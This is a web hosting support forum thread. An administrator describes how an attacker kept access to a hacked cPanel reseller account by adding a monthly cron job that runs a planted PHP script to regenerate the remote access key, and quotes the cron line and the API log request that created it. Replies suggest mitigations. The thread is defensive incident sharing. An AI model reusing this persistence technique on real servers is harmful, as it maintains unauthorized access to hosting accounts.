cron to generate new remote access key
Hello,
This is a new one we've ran into today.
We had a customer that was hacked, we are still unable to find out how initially but their cPanel account is a reseller. They were sending remote API commands to change all passwords on the cPanel accounts under the reseller. We found out in the access logs they were using the remote access key so we cleaned up the accounts and generated a new hash key. A day later same thing occurs, I just happened to been going through the access logs and noticed this:
Right away, I checked the crons for that user and saw: 0 0 1 * * php -q /home/USER/tmp/cron.php Sure enough, clever little guy: pastebin.com/PvbQmmRn I have yet to see this, been working heavily with cPanel for over 6 years, not sure if this is something new, but I figured I would share this with everyone if you are experiencing it and maybe see if cPanel can implement some way to counter this. Ill be happy to share any other info, but hopefully this will help others who are pulling their hair out, my eyes are bleeding from going through thousands of lines via the cpanel access logs. -Justin
206.190.158.75 - USER [09/22/2015:18:19:13 -0000] "GET /cpsess5668280899/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Cron&cpanel_jsonapi_func=add_line&minute=0&hour=0&day=1&month=*&weekday=*&command=php%20-q%20%2Fhome%2FUSER%2Ftmp%2Fcron.php&cache_fix=1442945927803 HTTP/1.1" 200 0 "https://server:2083/cpsess5668280899/frontend/x3/cron/index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" "-" "-"
Right away, I checked the crons for that user and saw: 0 0 1 * * php -q /home/USER/tmp/cron.php Sure enough, clever little guy: pastebin.com/PvbQmmRn I have yet to see this, been working heavily with cPanel for over 6 years, not sure if this is something new, but I figured I would share this with everyone if you are experiencing it and maybe see if cPanel can implement some way to counter this. Ill be happy to share any other info, but hopefully this will help others who are pulling their hair out, my eyes are bleeding from going through thousands of lines via the cpanel access logs. -Justin
-
Hello :) Thank you for taking the time to share this with others on the forum. The best way to address this issue is to determine how the account is getting hacked and take steps to prevent it from happening again. Is there a specific feature you feel would be helpful when this happens? Thank you. 0 -
Well its your typical WP hack, out dated plugin, etc, I was merely just pointing out the way they were able to keep generating a new hash with a PHP script. I don't personally know what or if something could be put into place to prevent that, I figure I would just share and let you guys with the brains decipher if there is anything that can be done, if not, then at least others can be aware of the possibility. 0 -
Impressive hack to maintain access, thanks for sharing. 0 -
That's call eagle eye..Reading logs aint joke.. 0 -
By default, resellers have privileges that allow them to setup a remote access key. One potential feature request you could open would be to include an option to limit the ability for resellers to setup remote access keys. That being said, in the meantime, for anyone that notices an account is hacked, it's always a good idea to review cron jobs configured for an account after it's been hacked in addition to any new files uploaded or changes made to existing files. Thank you. 0
Please sign in to leave a comment.
Comments
5 comments